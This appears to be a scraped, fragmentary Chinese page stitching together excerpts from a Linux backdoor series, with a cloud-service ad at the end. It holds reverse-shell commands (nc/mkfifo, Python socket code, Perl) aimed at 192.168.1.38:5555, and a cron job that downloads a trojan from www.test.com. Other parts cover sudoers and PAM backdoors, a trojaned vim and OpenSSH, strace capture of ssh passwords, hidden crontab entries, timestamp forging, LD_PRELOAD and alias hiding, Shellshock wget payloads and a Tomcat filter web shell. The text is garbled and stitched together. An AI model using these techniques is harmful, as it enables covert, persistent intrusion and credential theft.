---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...Common uses include: · simple TCP proxies · shell-script based HTTP clients...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...> /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门,经过尝试, 加上 -k 只能保证端口开放,没有办法保持命令执行 如果你遇到的nc 有 -e 或者 -c 选项,可以尝试
之前提到的所有的反弹shell的方法都有一个共同的缺点:明文传输 我们传输的命令不被安全软件拦截才怪 本来我是打算base64编码进行测试的,但是失败了,这里有个问题需要以后去深究,这里仅仅抛出来 nc...192.168.1.38 5555 | bin/bash 可以实现攻击机一条一条执行命令而shell不断 ?...配置监听和反弹shell ?...可以看到,反弹shell失败了,错误消息都被重定向到 /dev/null 了,我们把它去掉,看看报什么错误 ?...成功反弹shell并执行,抓包看一下 ? 可以看到,传输采用的也是 TLSv1.2
下面进行Python3反弹shell的测试 msf 生成python3 shell sudo ....所以思路来了: 要保证我们后门的名字和模块的名字一样 我们的后门路径要优先被索引 最好名称能正常一点或者以 ....纵观默认的整个 sys.path ,好像只有两个是比较适合留shell的(每个人对这个后门的想法多少还是有点不一样) _sysconfigdata_m.py lsb_release.py 我们还是使用...没想到 /usr/lib/python3.5/ 目录下还有一个跟这个文件名类似的文件,简直不要太好,我们看看文件内容,好决定怎么留后门,截取一小部分 ? ?...在 /usr/lib/python3.5/plat-x86_64-linux-gnu/ 创建 STYLE.py ?
0x01 无history记录执行命令 《Linux 应急响应手册》中,我曾介绍了三种不会在 history 中留下信息的场景,今天再介绍第四种 ssh 提供了一种登录不进入shell,直接执行命令的场景...连接服务器清空历史命令,并留下mark 2)Mac 下通过上述方式执行命令 3)Kali 通过 ssh 连接服务器,查看 history 可以看到, history 中并未记录我们执行的命令 0x02 不落地执行 shell...没有文件落地,执行了 shell 脚本 2. 有参数脚本 ssh root@192.168.1.1 "bash -s" < evil.sh "param" evil.sh 以下列代码为例 #!.../bin/bash echo "file name is $0" echo "param is $1" 没有文件落地,执行了需要传递参数的 shell 脚本
反弹shell代码 import socket, subprocess, os; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect...物理机 监听5555端口并获取反弹的shell ? 参考文章: https://youtu.be/kahNGFF2AU8
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...sudo vim /etc/sudoers.d/README 这样就可以通过控制一个普通账号随时获取 root 权限 4) 小延伸 如果你是一个受限,非交互的 shell ,可以通过标准输入的方式执行...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit...正常使用 sudo ,查看效果 sudo cat /etc/shadow 成功获取到 shell
环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...参数 下面以通过 +libcall 调用 libc 中的 system 函数,执行反弹shell 脚本为例 let result = libcall("/usr/lib/x86_64-linux-gnu...函数,执行的是系统命令,那可以通过加一个 & 符号让命令在后台执行 对于反弹shell来说,如果接收反弹shell处未开启监听,会产生报错 2.
/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...用户登录或切换(即Login shell 启动)时都有一个专用的运行环境,但首先执行 /etc/profile /etc/bashrc 【系统级】在 bash shell 打开时运行,修改该文件配置的环境变量将会影响所有用户使用的...bash shell ~/.bashrc 【用户级】当用户登录时以及每次打开新的shell时该文件都将被读取,不推荐在这里配置用户专用的环境变量,因为每开一个shell,该文件都会被读取一次,效率肯定受影响...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...后门 ?
成功反弹shell 成功获取 meterpreter shell ?...设置~/.ssh/config 中Host为*处设置 ProxyCommand 参数为执行我们的恶意脚本,并保存 ssh连接其他主机 成功获取meterpreter shell ProxyCommand
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r( Linux 中显示为M),导致显示截断,从而隐藏我们真实的计划任务,我们使用crontab -e 可以看到真实的计划任务如下: ?
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码,看一下 stat 应用是如何获取和管理 ctime 的,针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟,系统时钟存在于Linux 内核中,而硬件时钟存在于硬件主板上 从两种时钟的命名上可以看出,硬件时钟肯定是要比系统时钟更加持久,毕竟系统时钟系统关机就没了嘛 硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门,现在执行并放置后台,如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update
成功获取到反弹shell ,劫持成功。 加固后门 正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示 这个简单了,把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后,先把这些命令都劫持一下: env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功 现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用,那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美!
,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...命令,所以我们可以知道,在这些脚本文件中的 shell 代码是会在任意用户登录后执行的,所以就出现了两种留后门的方案 修改默认脚本 新建恶意脚本 修改默认脚本 msf 生成基于 python 的 payload...具体可以参照下面这篇文章: Linux篇:shell脚本中if的 “-e,-d,-f” https://www.jianshu.com/p/1f556bbfcd20 后面的 ....有些场景下,插入我们的指令后出现登录卡住的问题,当然反弹shell 没有问题,ssh 的正常功能收到了影响 可以使用 Linux 的 fork,让父进程退出,子进程继续执行,这样就一般就不会卡住了(这里的
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
perl line (optionally cd to directory) -X disable all warnings perl 和 Python 在做反弹shell...基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我不太懂 perl ,这里就直接上反弹shell的命令了 -e / -E perl -e...If not specified, the telnet port (23) is used. telnet 反弹shell的方式和 nc 是一样的,在这里不过多描述了 ---- 在这里再添加一点之前遗漏的小东西
)是大多数Linux系统以及Mac OS X v10.4默认的shell,它能运行于大多数Unix风格的操作系统之上,甚至被移植到了Microsoft Windows上的Cygwin系统中,以实现windows...Bash其广泛的使用将意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难以幸免。...漏洞原理: Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令...而在处理这样的“函数环境变量”的时候,并没有以函数结尾“}”为结束,而是一直执行其后的shell命令 受影响的版本: ?...-O /tmp/shell| /bin/chomd 777 /tmp/shell | /tmp/shell Cookie, ().{.:;.};.wget /tmp/besh http://X.X.X.X
[TOC] 0x00 前言 描述:Shellshock又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,2014年9月24日Bash被公布存在远程代码执行漏洞,最初认为该漏洞只是本地漏洞...)是大多数Linux系统以及Mac OS X v10.4默认的shell,它能运行于大多数Unix风格的操作系统之上,甚至被移植到了Microsoft Windows上的Cygwin系统中,以实现windows...Bash其广泛的使用将意味全球至少 150 万的主机将受到影响,此外 Linux/Unix 世界内的安卓和苹果都难以幸免。...漏洞原理: Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令...-O /tmp/shell| /bin/chomd 777 /tmp/shell | /tmp/shell Cookie, ().{.:;.};.wget /tmp/besh http://X.X.X.X
UnixBash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的,可以利用一下隐藏文件夹和文件。 方法一 比如创建一个名字开头带 ....利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳 简介 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用touch就可以了。...系统环境: dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux SUID shell...PAM最初是集成在Solaris中,目前已移植到其它系统中,如Linux、SunOS、HP-UX9.0等。 搭建PAM后门主要思路:pam_unix_auth.c打补丁安装到正常的PAM模块中。
[TOC] Tomcat源代码调试看不见的 Shell 描述: 调试了 tomcat 从接收到一个socket, 到解析socket 并封装成Request 转发至 Jsp/Servlet 的全过程 Step1...WeiyiGeek. shell示例: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding...随后任何带有 cmd 参数的请求都会被此过滤器拦下来,并执行 shell 命令,达到“看不见的 shell”的效果。
领取专属 10元无门槛券
手把手带您无忧上云